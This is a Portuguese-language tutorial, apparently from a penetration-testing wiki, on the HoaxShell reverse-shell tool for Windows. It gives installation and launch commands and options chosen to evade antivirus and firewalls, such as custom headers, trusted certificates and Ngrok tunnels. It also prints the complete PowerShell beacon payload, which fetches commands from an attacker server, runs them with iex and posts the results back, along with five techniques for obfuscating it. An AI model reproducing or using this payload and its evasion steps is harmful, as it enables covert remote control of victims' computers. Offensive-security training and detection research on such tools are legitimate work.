HoaxShell - Reverse Shell
Definição: Hoaxshell é um gerador e manipulador de payloads de shell reversa para Windows que abusa do protocolo http(s) para estabelecer uma shell reversa no estilo beacon, baseado no seguinte conceito:
Hoaxshell cmd-line interface: o atacante digita um comando na interface de linha de comando (cmd) do Hoaxshell;
Issued command is web hosted via web hosted via hoaxshell's http(s) server: esse comando é disponibilizado através do servidor HTTP(S) embutido do Hoaxshell, que roda na máquina do atacante;
Victim machine polls the server: a máquina da vítima, que está executando o payload do Hoaxshell, envia uma requisição HTTP GET ao servidor do atacante a cada X segundos (por padrão, a cada 0,8 segundos) para verificar se há novos comandos;
If a command is found in the response: a máquina da vitima executa o comando e envia o resultado da execução de volta ao atacante por meio de uma requisição HTPP POST para o servidor Hoaxshell.
Usando apenas trafego HTTP(S), essa comunicação imita o trafego normal da web, o que ajuda a burlar firewalls e evitar a detecção de antivirus e outras ferramentas de segurança.
O conceito de c2 (command and controle, que poderia ser implementado usando protocolos além de http ou executáveis pre-instalados) pode ser usado para estabelecer sessões que promovem a ilusão se ter um shell, mas que estão longe de ser um verdadeiro pty (pseudo-terminal).
HoaxShell teve um bom desempenho contra softwares antivírus. Embora agora ele seja geralmente detectado, é fácil ofuscar os payloads gerados usando ferramentas automatizadas ou manualmente.
Instalação
Instala o script hoaxshell e concede permissão de execução:
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.pyUtilização
Quando você executa o hoaxshell, ele gera automaticamente um payload em PowerShell para você copiar e injetar na vítima. Por padrão, o payload é codificado em base64 para maior comodidade. Se você precisar do payload em formato bruto (sem codificação), execute o comando rawpayload no prompt ou inicie o hoaxshell com o argumento -r.
Após o payload ser executado na máquina da vítima, você poderá executar comandos PowerShell nela.
Payload que utiliza Invoke-Expression (default):
sudo python3 hoaxshell.py -s <your_ip>Uso recomendado para evitar detecção (conexões http): o Hoaxshell utiliza um cabeçalho HTTP para transferir informações da sessão de shell. Por padrão, esse cabeçalho recebe um nome aleatório, o que pode ser detectado por regras de antivírus baseadas em expressões regulares (regex). Use a opção -H para fornecer um nome de cabeçalho HTTP padrão ou personalizado e assim evitar a detecção.
sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"
sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization" -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"Sessão de shell criptografada com um certificado confiável: se você possui um domínio, use esta opção para gerar um payload https mais curto e menos detectável, fornecendo seu DN com a opção -s junto com um certificado confiável (-c cert.pem -k privkey.pem).
sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>Modo de captura de sessão: caso você feche o terminal acidentalmente, tenha uma queda de energia ou algo do tipo, você pode iniciar o hoaxshell em modo de captura de sessão. Ele tentará restabelecer a sessão, desde que o payload ainda esteja em execução na máquina da vítima.
sudo python3 hoaxshell.py -s <your_ip> -gCertifique-se de iniciar o hoaxshell com as mesmas configurações da sessão que você está tentando restaurar (http/https, porta, etc.).
Sessão de shell via HTTPS usando ferramentas de tunelamento: utilize programas de tunelamento como Ngrok ou LocalTunnel para obter sessões através de túneis seguros, superando problemas como não ter um IP estático ou o seu provedor de internet (ISP) bloquear o redirecionamento de portas (Port-Forwarding).
Utilize -ng ou --ngrok para servidor Ngrok:
sudo python3 hoaxshell.py -ngUtilize -lt ou --localtunnel para servidor LocalTunnel:
sudo python3 hoaxshell.py -ltLimitações
O shell vai travar se você executar um comando que inicie uma sessão interativa.
# esse comando vai executar com sucesso:
powershell echo 'This is a test'
# mas esse vai abrir uma sessão interativa dentro da sessão do hoaxshell o que vai fazer o shell quebrar:
powershell
# da mesma forma, voce não terà problemas executando isso:
cmd /c dir /a
# mas isso vai fazer o hoaxshell travar:
cmd.exeEm resumo, você precisa ter cuidado para não executar um .exe ou comando que inicie uma sessão interativa dentro do contexto do PowerShell do Hoaxshell.
Ofuscação
Para realizar a ofuscação do payload, é necessário primeiro gerar o payload raw do Hoaxshell:
sudo python3 hoaxshell.py -s 127.0.0.1 -r -H "Authorization"Você deverá ver uma saída semelhante a esta:
$s='127.0.0.1:8080';$i='4afac2ae-ac41bbb7-13fa1396';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/4afac2ae -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/ac41bbb7 -Headers @{"Authorization"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/13fa1396 -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}Técnica 1: utilizar interpolação de strings:
$s='127'+'.0.0'+'.1:80'+'80';$i='4afac2ae-ac41bb'+''+''+'b7-13fa1396'; ...Técnica 2: o PowerShell permite a execução de comandos entre aspas:
# esse comando executad
pwd
# esse também exutada
p'w'dDessa forma, podemos modificar os comandos nos payloads para contribuir com a ofuscação:
$s='127.0.0.1:8080';$i='4afac2ae-ac41bbb7-13fa1396';$p='http://';$v=In'vo'ke-We'bR'eq'ue'st -UseBasicParsing -Uri $p$s/4afac2ae -Headers @{"Authorization"=$i};while ($true){$c=(In'vo'ke-We'bR'equ'es't -UseBasicParsing -Uri $p$s/ac41bbb7 -Headers @{"Authorization"=$i}).Content;if ($c -ne 'None') {$r=i'e'x $c -ErrorAction Stop -ErrorVariable e;$r=Out-String ...Técnica 3: utilizar variáveis no lugar de strings para dificultar a detecção:
$xxxx='None'$s='127.0.0.1:8080';$i='4afac2ae-ac41bbb7-13fa1396';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/4afac2ae -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/ac41bbb7 -Headers @{"Authorization"=$i}).Content;if ($c -ne $xxxx) ...Técnica 4: alterar os valores de templates de string diretamente no código:
Primeiro, é necessário modificar o script que gera o payload para utilizar a nova variável:
nano http_payload.ps1Payload original:
$s='*SERVERIP*';$i='*SESSIONID*';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/*VERIFY* -Headers @{"*HOAXID*"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/*GETCMD* -Headers @{"*HOAXID*"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/*POSTRES* -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep *FREQ*}
Payload modificado:
$s='*SERVERIP*';$i='*SESSIONID*';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/*VERIFY* -Headers @{"*HOAXID*"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/*GETCMD* -Headers @{"*HOAXID*"=$i}).Content;if ($c -ne 'HawkSec') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/*POSTRES* -Method POST -Headers @{"*HOAXID*"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep *FREQ*}Acesse o arquivo hoaxshell.py, localize a string None e substitua por HawkSec:
...
else:
self.wfile.write(bytes('HawkSec', "utf-8"))
...Ao gerar um novo payload, o template de string None será substituído pelo valor definido durante a edição do template de payload.
$s='127.0.0.1:8080';$i='6111e500-00923cb4-6db6b553';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/6111e500 -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/00923cb4 -Headers @{"Authorization"=$i}).Content;if ($c -ne 'HawkSec') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/6db6b553 -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}Técnica 5: substituir variáveis pelos seus respectivos valores:
Neste caso, a variável $i é utilizada em vários pontos e pode ser substituída pelo seu valor correspondente.
$s='127.0.0.1:8080';$i='3be6c98f-20b0058e-105caf2c';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/3be6c98f -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/20b0058e -Headers @{"Authorization"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/105caf2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}Payload após a substituição:
$s='127.0.0.1:8080';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/3be6c98f -Headers @{"Authorization"='3be6c98f-20b0058e-105caf2c';while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/20b0058e -Headers @{"Authorization"='3be6c98f-20b0058e-105caf2c'}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/105caf2c -Method POST -Headers @{"Authorization"='3be6c98f-20b0058e-105caf2c'} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}Referências
Atualizado